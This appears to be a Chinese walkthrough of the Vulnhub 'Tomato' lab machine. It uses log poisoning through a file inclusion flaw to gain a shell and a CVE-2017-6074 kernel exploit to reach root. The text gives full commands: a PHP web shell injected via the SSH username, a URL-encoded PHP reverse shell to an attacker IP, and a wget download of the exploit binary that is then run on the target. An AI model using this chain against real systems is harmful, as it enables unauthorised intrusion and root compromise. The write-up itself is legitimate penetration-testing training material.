Vulnhub系列:Tomato(文件包含getshell)

这个靶机挺有意思,它是通过文件包含漏洞进行的getshell,主要姿势是将含有一句话木马的内容记录到ssh的登录日志中,然后利用文件包含漏洞进行包含,从而拿到shell

0x01 靶机信息

靶机:Tomato

难度:中—难

下载:https://www.vulnhub.com/entry/tomato-1,557/

靶机描述:

Vulnhub系列:Tomato(文件包含getshell)

 

 

0x02 信息收集

nmap扫描存活主机确定靶场ip

nmap -sP 192.168.43.0/24

Vulnhub系列:Tomato(文件包含getshell)

 

 

 

接下来扫描靶机的端口

nmap -sS -sV -p- -v 192.168.43.165

Vulnhub系列:Tomato(文件包含getshell)

 

 

 

0x03 漏洞发现

然后访问web服务

Vulnhub系列:Tomato(文件包含getshell)

 

 

网站目录扫描

dirb http://192.168.43.165:80

Vulnhub系列:Tomato(文件包含getshell)

 

 

访问antibot_image发现存在目录遍历

Vulnhub系列:Tomato(文件包含getshell)

 

 

发现info.php是phpinfo的界面

Vulnhub系列:Tomato(文件包含getshell)

 

 

查看页面源代码发现一串文件包含的代码

Vulnhub系列:Tomato(文件包含getshell)

 

 

http://192.168.43.165/antibot_image/antibots/info.php?image=/etc/passwd

Vulnhub系列:Tomato(文件包含getshell)

 

 

0x04 漏洞利用

接下来尝试文件包含被污染的SSH日志来getshell

ssh '<?php system($_GET['shell']); ?>'@192.168.43.165 -p2211

Vulnhub系列:Tomato(文件包含getshell)

 

 

这样'<?php system($_GET['shell']); ?>'该用户就会被记录到ssh的日志中去

ssh日志在/var/log/auth.log中

开启nc监听

nc -lvnp 3388

Vulnhub系列:Tomato(文件包含getshell)

 

反弹shell   将

http://192.168.43.165/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&shell=php -r '$sock=fsockopen("192.168.43.221",3388);exec("/bin/sh -i <&3 >&3 2>&3");'

其中以下语句是建立socket会话,然后反向连接

php -r '$sock=fsockopen("192.168.43.221",3388);exec("/bin/sh -i <&3 >&3 2>&3");'

然后进行url编码

http://192.168.43.165/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&shell=php+-r+%27%24sock%3dfsockopen(%22192.168.43.221%22%2c3388)%3bexec(%22%2fbin%2fsh+-i+%3c%263+%3e%263+2%3e%263%22)%3b%27

访问URL,成功反弹shell

Vulnhub系列:Tomato(文件包含getshell)

 

 

0x05 权限提升

我们首先建立可交互式shell

python3 -c "import pty;pty.spawn('/bin/bash')"

Vulnhub系列:Tomato(文件包含getshell)

 

然后查看linux内核版本

uname -a

Vulnhub系列:Tomato(文件包含getshell)

 

去github上去找这个版本的exp

https://github.com/kkamagui/linux-kernel-exploits

用这个CVE-2017-6074的

Vulnhub系列:Tomato(文件包含getshell)

 

下载到本地

git clone https://github.com/kkamagui/linux-kernel-exploits.git

然后运行compile.sh 编译c文件

Vulnhub系列:Tomato(文件包含getshell)

 

 

并上传到目标主机

python -m SimpleHTTPServer 8000

Vulnhub系列:Tomato(文件包含getshell)

 

然后用wget下载到靶机上

wget http://192.168.43.221:8000/CVE-2017-6074

Vulnhub系列:Tomato(文件包含getshell)

 

查看该文件的权限

ls -l

Vulnhub系列:Tomato(文件包含getshell)

 

 

赋予执行权限

chmod +x CVE-2017-6074

Vulnhub系列:Tomato(文件包含getshell)

 

运行该文件

Vulnhub系列:Tomato(文件包含getshell)

 

发现已经拿到root权限

 

参考:https://mp.weixin.qq.com/s/40zG1Tjmo_8pbbpN-IWZ4A

上一篇:vulnhub靶机测试--dpwnn 01


下一篇:靶机练习-VulnHub-Toopo